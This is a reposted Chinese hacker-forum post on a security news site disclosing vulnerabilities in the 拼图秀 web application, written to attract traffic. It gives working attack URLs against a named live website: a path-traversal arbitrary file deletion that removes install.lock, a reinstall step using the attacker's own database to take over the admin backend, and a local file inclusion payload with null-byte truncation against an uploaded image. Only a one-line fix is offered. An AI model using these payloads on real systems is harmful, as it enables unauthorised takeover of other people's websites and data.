当前位置: 爱尖刀 > 首页安全 > 漏洞补丁 > 正文

拼图秀重复安装漏洞

2012-12-31 12:55 来源:土司论坛 浏览次数:767 我来说两句(0)

你妹啊。。脚本版本怎么发不了贴子啊。。
发现做站真苦逼啊。。10天半个月,1个流量都没有啊。非得发oday来吸引流量啊。。
以下文章转载请注明作者版权及作者网站网址,不然没JJ。

拼图秀,官网:[url=http://bbs.onightjar.com/]http://bbs.onightjar.com/[/url]
早前的挖的洞洞了。刚才试了下百度。
发现好多站。都直接就能重复安装了
输入下面的地址
http://www.hwtz8.com/index.php?c=install
就能出现安装界面了。
我估计吧。是管理员都把data/install.lock这个东东删除了
这是啥玩意。大家应该懂的吧。。
如果这个东东没被删除呢。。那怎么办。。没事。咱自己来帮它删。。
先注册个用户,然后登录,访问下面地址,删除install.lock文件
http://www.hwtz8.com/index.php?c=webuser&a=save_avatar&filename=../../../data/install.lock&type=avatar
晓得吧。。任意文件删除漏洞。。想删哪个删哪个。
删完后就能重新安装了。。重新安装。。数据库咱填自己的。。安装后就能进后台了。进了后台后。。就随便你了。。。。
至于修复呢,就是删除/controller/install.php了。我估计官网就是删了这东西。所以官网能删任意文件。但是输入安装的路径。
出来空白页面。

嗯,然后呢。还有个本地包含漏洞。。你注册个用户。传个图片上去。。然后输入
http://www.hwtz8.com/ajaxtpl/render_tpl/?tpl=../../../../../../data/attachments/tmp/1353993495.jpg%00.
就包含了。。。可惜呢。。哥找遍了网上相关资料。都说加%00啊还有加啥的呀。就能截断了。
可是我百试不灵啊。。求指教,求津液,求讨论。。




[广告]赞助链接:

知安,互联网产品安全医院:http://www.knowsafe.com
舆情监测,互联网舆情首选查舆情:http://www.chayuqing.com/
爱尖刀科技,关注企业数据与安全:http://www.ijiandao.com

关注公众号:Mcbang_com 了解更多精彩,关注:chayuqing_com 娱乐资讯早知道!
收藏 分享 发布者: 疯子 |
看完这篇文章,你的感受如何?


伤心


无视


惊讶


流汗


赞同


路过
热点聚焦
更多>>
情凝中秋,乐在团圆 中秋节又称团圆节,是从古代至今,对远方亲人思念之情的体现;也是东方 ... [详细]
传递爱心 帮助需要的人 中国红十字已不能信任,民政系统变的自私,在这样的环境下,很多需 ... [详细]
【D盾】- 携手啊D共推《 [详细]
父亲节(Father's D 温家宝:父爱,如大海般深沉而宽广。 我们的力量出自与父亲,我们的 ... [详细]
祝高考学子凯旋而归 明后两天,高中三年的最后两天,也是将会影响命运的两天! 3年=1095天 ... [详细]
Copyright© 2006-2016 IjianDao.Com All rights reserved.
网络尖刀 版权所有 京ICP备14006288号-3